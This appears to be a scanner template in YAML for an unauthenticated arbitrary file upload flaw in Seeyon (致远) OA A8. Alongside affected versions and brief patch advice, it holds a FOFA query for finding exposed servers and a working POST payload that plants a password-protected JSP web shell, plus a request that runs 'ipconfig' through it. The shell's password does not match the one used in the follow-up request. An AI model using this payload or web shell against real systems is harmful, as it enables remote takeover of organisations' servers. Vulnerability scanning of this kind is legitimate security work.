product: 致远OA
vName: 致远OA A8 htmlofficeservlet 任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 远程攻击者在无需登录的情况下可通过向 URL /seeyon/htmlofficeservlet POST 精心构造的数据即可向目标服务器写入任意文件，写入成功后可执行任意系统命令进而控制目标服务器。
version: 致远A8-V5协同管理软件V6.1sp1、致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3、致远A8+协同管理软件V7.1
note: 访问/seeyon/test123456.jsp?pwd=abab3344&cmd=ipconfig，可执行系统命令
search:
  FOFA: app="致远互联-OA"
protocol: http
link: https://developer.aliyun.com/article/1260375?spm=5176.26934562.main.3.2beb2d3bhMutHl
fix:
  - 对路径/seeyon/htmlofficeservlet进行访问限制。
  - 致远官方已发布补丁，请联系官方安装相应补丁。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /seeyon/htmlofficeservlet
      data: 'DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV\nOPTION=S3WYOSWLBSGr\ncurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\nCREATEDATE=wUghPB3szB3Xwg66\nRECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\noriginalFileId=wV66\noriginalCreateDate=wUghPB3szB3Xwg66\nFILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6\nneedReadFile=yRWZdAS6\noriginalCreateDate=wLSGP4oEzLKAz4=iz=66\n<%@
        page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public
        static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try
        {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new
        InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine())
        != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return
        line.toString();} %><%if("asasd33445".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))
        + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
  - exp:
      method: get
      follow: false
      path: /seeyon/test123456.jsp?pwd=abab3344&cmd=ipconfig
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - IPv4
            logic: and